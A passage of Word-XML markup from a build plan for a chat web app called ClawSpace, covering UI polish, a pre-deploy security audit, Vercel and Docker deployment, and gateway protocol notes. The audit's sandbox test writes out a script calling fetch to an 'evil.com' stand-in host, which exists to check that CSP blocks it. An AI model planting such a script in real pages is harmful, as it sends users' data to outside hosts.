          <w:ilvl w:val="1"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RPC failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1041"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Message send failures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Empty states:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Design empty states for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No projects yet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No messages in project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No artifacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1042"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Not connected to Gateway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Loading skeletons:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use shadcn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Skeleton</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Project list loading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Message list loading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1043"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Settings loading</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="89"/>
    <w:bookmarkStart w:id="90" w:name="step-8.5-connection-resilience"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 8.5: Connection Resilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reconnection logic is built into</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GatewayClient</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Phase 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add visual indicators:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Banner at top of chat:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reconnecting…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with countdown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Queued messages indicator (messages sent while disconnected)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Re-send queued messages after reconnect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Re-subscribe to active project session after reconnect</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="90"/>
    <w:bookmarkStart w:id="91" w:name="step-8.6-performance"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 8.6: Performance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Virtualized message list:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">For projects with 1000+ messages, use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">react-virtuoso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or similar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Debounced search:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If implementing project search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Lazy loading:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Artifact previews, especially HTML iframes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Memoization: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on message bubbles,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on markdown rendering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phase-9-deploy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 9: Deploy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~1.5 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: All prior phases</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Security deliverables:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Security header verification, HTTPS enforcement, Docker hardening, env var audit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="93" w:name="step-9.1-pre-deploy-security-audit"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 9.1: Pre-Deploy Security Audit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Run this checklist BEFORE deploying to production.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Grep for secrets:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rn "SUPABASE_SERVICE_ROLE_KEY\|CHANGE_ME\|password\|secret" src/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— must return zero matches outside of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Verify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dangerouslySetInnerHTML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grep -rn "dangerouslySetInnerHTML" src/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— must be zero (all HTML rendering goes through sandboxed iframes)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Verify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rehype-sanitize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is used on every</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ReactMarkdown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">instance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -rn "ReactMarkdown" src/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ each must include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rehypeSanitize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in plugins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Verify CSP headers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">load correctly: run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">npm run build &amp;&amp; npm run start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, then check headers with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://localhost:3000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Test RLS:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sign up as User A, create a project. Sign up as User B, attempt to query User A’s project via Supabase client — must fail.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Verify token not in localStorage:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Open DevTools → Application → Local Storage → search for any gateway token value — must not appear.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Test iframe sandbox:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Create an HTML artifact containing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;fetch('https://evil.com')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— must be blocked by CSP.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="93"/>
    <w:bookmarkStart w:id="95" w:name="step-9.2-vercel-deployment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 9.2: Vercel Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Push to GitHub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect repo to Vercel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set environment variables in Vercel dashboard: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NEXT_PUBLIC_SUPABASE_URL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NEXT_PUBLIC_SUPABASE_ANON_KEY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— 🔒 Mark as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sensitive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in Vercel (hides from logs)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Verify HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is enforced (Vercel does this by default)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Post-deploy: verify security headers at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId94">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">securityheaders.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="95"/>
    <w:bookmarkStart w:id="96" w:name="step-9.3-self-host-docker"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 9.3: Self-Host Docker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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#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Run as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1001 nodejs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1001 nextjs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/app/.next/standalone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/app/.next/static ./.next/static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/app/public ./public</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#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Non-root execution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nextjs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CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 🔒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Set NODE_ENV explicitly (prevents dev-mode debug info leaking)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HOSTNAME=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"0.0.0.0"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The Docker image runs as a non-root user (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nextjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Never run as root in production — container escape + root = full host compromise.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'standalone'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6"/>
    <w:bookmarkStart w:id="97" w:name="step-9.4-documentation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 9.4: Documentation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with:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- What ClawSpace is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Screenshots</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Quick start (Vercel deploy button)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Self-host instructions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Environment variables reference</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Connecting to your OpenClaw Gateway</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Tailscale setup guide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="97"/>
    <w:bookmarkStart w:id="98" w:name="step-9.5-create-.env.local.example"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 9.5: Create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env.local.example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NEXT_PUBLIC_SUPABASE_ANON_KEY=your-anon-key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SUPABASE_SERVICE_ROLE_KEY=your-service-role-key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Default gateway URL (optional — users configure in UI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NEXT_PUBLIC_DEFAULT_GATEWAY_URL=ws://localhost:18789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dependency-graph"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dependency Graph</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 0 (Scaffold)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├─→ Phase 1 (Auth + DB)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │     ├─→ Phase 3 (Connection UI) ─→ Phase 4 (Projects)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │     └─→ Phase 4 (Projects)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └─→ Phase 2 (Gateway Client)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        ├─→ Phase 3 (Connection UI)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        └─→ Phase 6 (Chat Integration)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 (Projects) ─→ Phase 5 (Chat UI) ─→ Phase 6 (Integration)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Phase 5 (Chat UI) ──────────────────→ Phase 7 (Artifacts)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Phase 8 (Polish) ─→ Phase 9 (Deploy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Critical path:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Phase 0 → Phase 2 → Phase 6 (Gateway client must work before chat integration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Parallel work possible:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Phase 1 (auth) and Phase 2 (gateway client) can be built simultaneously</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Phase 5 (chat UI) can be built with mock data while Phase 2 is in progress</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Phase 7 (artifacts) can start once chat messages render</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="whats-deferred-to-v1.1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What’s Deferred to V1.1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Deferral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Complex, not core to chat experience. Ship project spaces + chat + artifacts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attachments in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file browser + Supabase Storage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email/password, add OAuth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Single-user MVP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Relay server for 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Tailscale covers this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Payment/subscription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PWA / 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summary-of-protocol-corrections-applied"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Summary of Protocol Corrections Applied</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This plan uses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protocol from the OpenClaw source code, not the simplified version in the BUILD-BRIEF. Key differences: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Framing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All messages use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{type, id, method/event, params/payload}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— not bare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{method, params}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Handshake:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Server sends</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect.challenge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">event → client sends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request → server responds with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hello-ok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Token sent in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect.params.auth.token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— NOT as a URL query parameter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  <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">idempotencyKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Required field on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.send</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(NonEmptyString) — not optional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Chat events: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field with values</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">delta | final | aborted | error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">event: "text" | "done"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Device identity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Required for non-local connections; uses WebCrypto ECDSA P-256 keypair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Client ID:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Must be a valid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GatewayClientId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"webchat-ui"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which is already registered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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Protocol version:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">minProtocol: 3, maxProtocol: 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— the current version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
